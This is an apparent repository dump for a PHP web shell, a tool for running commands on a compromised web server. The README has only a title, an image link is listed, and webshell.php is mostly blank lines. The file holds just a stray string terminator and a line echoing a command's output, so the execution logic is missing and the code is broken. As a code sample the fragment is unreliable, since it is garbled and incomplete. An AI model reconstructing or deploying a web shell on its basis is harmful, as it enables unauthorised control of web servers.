├── README.md
├── webshell.php
└── webshell.png
/README.md:
--------------------------------------------------------------------------------
1 | # WEBSHELL
2 |
3 |
4 |
--------------------------------------------------------------------------------
/webshell.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
7 |
8 |
9 |
10 | ";
15 | echo "The output: $output";
16 | ?>
17 |
--------------------------------------------------------------------------------
/webshell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Mr6MJT/WebShell/7e7fb88c7b71ae549cb0a5e478fe7eaaa91a034c/webshell.png
--------------------------------------------------------------------------------